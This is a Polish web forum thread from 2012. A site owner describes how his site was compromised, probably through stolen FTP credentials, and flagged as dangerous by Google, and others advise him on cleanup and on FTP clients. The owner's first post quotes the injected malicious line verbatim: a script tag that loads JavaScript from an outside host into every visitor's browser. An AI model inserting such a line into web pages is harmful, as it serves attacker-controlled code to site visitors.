Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Google uważa moją stronę za niebezpieczną
Forum PHP.pl > Inne > Hydepark
Lethys
5.06.2012, 11:01:31
Witam,

Spotkałem się z bardzo dużym problemem. Google uznało moja stronę za niebezpieczną.

Skutki:

- strona traci pozycje w wyszukiwarce
- praktycznie nikt nie wchodzi na stronę bo dostaje ostrzeżenie, że strona jest niebezpieczna

czyli równie dobrze można powiedzieć, że to koniec portalu...

Przyczyny:

Jakiś czas temu (kilka dni), na moją stronę wkradł się złośliwy kod (prawdopodobnie przez Total Commandera, miałem zapamiętywanie hasła włączone) i dodał w indexie linijke kodu:

[PHP] pobierz, plaintext 
  1. <!--piz...a--><script type=text/javascript src=http://mmm2011.ppcsoft.in/validate.js?ftpid=42759></script><!--/piz...a-->
[PHP] pobierz, plaintext



Co zrobiłem:

Tak jak mi poradzono, kod usunołem, usunołem Total Commandera, zmieniłem hasło do FTP.

W narzędziach dla webmastera google zgłosiłem, że kod usunąłem a mimo wszytsko google ciągle uważa, że kod ten istnieje.

Cytat
Adres URL: http://www.badzlepszy.pl/
Ostatnio sprawdzona: 3 czerwca 2012
Problem ogólny
Podczas ostatniego testowania tej strony przez Google serwer zwrócił treść, która spowodowała przekierowanie przeglądarki do witryny zawierającej złośliwe oprogramowanie. Niestety wyszukiwarka Google nie mogła wyodrębnić złośliwego kodu znajdującego się na stronie.



Mój kod index.php wygląda następująco:

http://paste.bradleygill.com/index.php?paste_id=376494

Tutaj nie mogłem wstawić bo za długi post....


Przeoczyłem gdzieś złośliwy kod? Jak to naprawićquestionmark.gif
!*!
5.06.2012, 11:14:34
Musisz odczekać, google nie indeksuje zaraz...
Lethys
5.06.2012, 11:38:37
No tak ale wczesniejszy bład miał datę jeszcze z maja. Złosliwy kod usunąłem 1 czerwca 2012 a google wykryłoniby jeszcze jakiś kod 3 czerwca 2012.

No nie wiem, może rzeczywiście odczytuje jeszcze starą wersje strony.
toffiak
5.06.2012, 11:43:39
Nie usunąłeś złośliwego kodu ze strony sprawdź pliki javascript, do wyszukiwania w wielu plikach można wykorzystać np TextFinderX.
Lethys
5.06.2012, 12:53:10
Miałeś racje, pliki css i js też były zmodyfikowane.

Wszystko naprawiłem, zobaczymy kiedy google odblokuje stronę smile.gif
kleopatrazone
11.06.2012, 08:34:12
przeważnie trzeba odczekać z jakiś miesiąc, aż google zacznie znowu indeksować dobrze stronę...
Lethys
13.06.2012, 10:46:28
Ehh wszystko było poprawione, strona była czysta przez jakiś czas a dzisiaj znowu to samo, tym razem zmienili mi szablony błędów.

Usunąłem strego total commandera, nagrałem nowego. Korzystałem z niego bez zapamiętywania hasła FTP. A samo hasło również było zmienione po pierwszy "włamaniu".

Mimo wszystko dzisiaj znowu ktoś mi zmodyfikował kod.


Jak się zabezpieczyć takimi atakami?
usb2.0
13.06.2012, 10:52:14
w ogole czy korzystanie z total commandera do ftp nie jest z rozwiązaniem z poprzedniej epoki?
ja tam zawsze uzywałem filezilla i nie miałem takich sensacji
!*!
13.06.2012, 10:54:20
Cytat
Jak się zabezpieczyć takimi atakami?

Zmienić system.
A jak to nie wchodzi w grę to klienta FTP, jakiegoś lepszego niż TC, przeskanuj dysk w poszukiwaniu syfu, bo może się okazać że masz coś jeszcze i po prostu każda zmiana hasła jest widoczna.
Lethys
13.06.2012, 10:56:46
Wszędzie jak patrzyłem jakieś rankingi programó ftp to TC był najbardziej polecany, poza tym jestem do niego przyzwyczajony.\

A czym się równi filezilla, miałem przez chwile to ciężko mi się było w tym odnaleźć tongue.gif
!*!
13.06.2012, 12:00:07
Programów FTP jest bardzo dużo, był nawet niedawno wątek o tym. Wpisz w google "total commander alternatywa" jest kilkanaście pozycji inne lepsze, drugie gorsze, ale nie odbiegają od pierwowzoru.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.